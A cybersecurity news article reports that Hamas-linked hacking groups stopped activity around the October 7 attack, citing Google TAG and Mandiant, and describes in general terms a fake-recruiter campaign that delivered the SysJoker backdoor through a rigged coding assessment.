Breaking cybersecurity news, news analysis, commentary, and other content from around the world, with an initial focus on the Middle East & Africa.

Hamas-linked threat actors have defied norms, with no discernible uptick in cyber operations prior to the group's attack in Israel — and a complete abandonment of them thereafter.

3 Min Read
Source: Daniren via Alamy Stock Photo

Cyber threat actors linked with Hamas have seemingly ceased activity ever since the terrorist attack in Israel on Oct. 7, confounding experts.

Combination warfare is old hat in 2024. As Mandiant said in a newly published report, cyber operations have become a "tool of first resort" for any nation or nation-aligned group around the world engaged in protracted conflict, be it political, economic, or warlike in nature. Russia's invasion of Ukraine — preceded and supported by historic waves of cyber destruction, espionage, and misinformation — is, of course, the quintessence.

Not so in Gaza. If today's playbook is to support resource-intensive kinetic war with low-risk, low-investment cyber war, Hamas has thrown out the book.

"What we saw all through September 2023 was very typical Hamas-linked cyber espionage activities — their activity was very consistent with what we've seen for years," Kristen Dennesen, threat intelligence analyst for Google's Threat Analysis Group (TAG), said in a press conference this week. "That activity continued on until just before October 7 — there wasn't any kind of shift or uptick prior to that point. And since that time, we haven't seen any significant activity from these actors."

Failing to ramp up cyberattacks prior to Oct. 7 might be construed as strategic. But regarding why Hamas (irrespective of its supporters) has quit its cyber operations instead of using them to support its war effort, Dennesen admitted, "We don't offer any explanation as to why because we don't know."

Hamas Pre-Oct. 7: 'BLACKATOM'

Typical Hamas-nexus cyberattacks include "mass phishing campaigns to deliver malware or to steal email data," said Dennesen, as well as mobile spyware via various Android backdoors dropped via phishing. "And finally, in terms of their targeting: very persistent targeting of Israel, of Palestine, their regional neighbors in the Middle East, as well as targeting of the US and Europe," she explained.

For a case study in what that looks like, take BLACKATOM — one of the three primary Hamas-linked threat actors, alongside BLACKSTEM (aka MOLERATS, Extreme Jackal) and DESERTVARNISH (aka UNC718, Renegade Jackal, Desert Falcons, Arid Viper).

In September, BLACKATOM began a social engineering campaign aimed at software engineers in the Israeli Defense Forces (IDF), as well as Israel's defense and aerospace industries.

The ruse involved posing as employees of companies on LinkedIn and messaging targets with fake freelance job opportunities. After initial contact, the false recruiters would send a lure document with instructions for participating in a coding assessment.

The fake coding assessment required recipients to download a Visual Studio project, masquerading as a human resources management app, from an attacker-controlled GitHub or Google Drive page. Recipients were then asked to add features to the project, to demonstrate their coding skills. Contained within the project, though, was a function that secretly downloaded, extracted, and executed a malicious ZIP file on the affected computer. Inside the ZIP: the SysJoker multiplatform backdoor.

'Nothing Like Russia'

It may seem counterintuitive that Hamas' invasion wouldn't have been paired with a shift in its cyber activity akin to Russia's model. This may be due to its prioritization of operational security — the secrecy that made its Oct. 7 terror attack so shockingly effective.

Less explicable is why the most recent confirmed Hamas-related cyber activity, according to Mandiant, occurred back on Oct. 4. (Gaza, meanwhile, has suffered from significant Internet disruptions in recent months.)

"I think the key thing to draw out is that these are very different conflicts, with very different entities involved," said Shane Huntley, senior director at Google TAG. "Hamas is nothing like Russia. And therefore, it's not surprising that the use of cyber is very different [depending on] the nature of the conflict, between standing armies versus a sort of attack like we saw on October 7."

But Hamas likely has not fully retired its cyber operations. "While the outlook for future cyber operations by Hamas-linked actors is uncertain in the near term, we do anticipate that Hamas cyber activity will eventually resume. It should be focused on espionage for intelligence-gathering on these intra-Palestinian affairs, Israel, the United States, and other regional players in the Middle East," Dennesen noted.

About the Author(s)

Nate Nelson, Contributing Writer

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights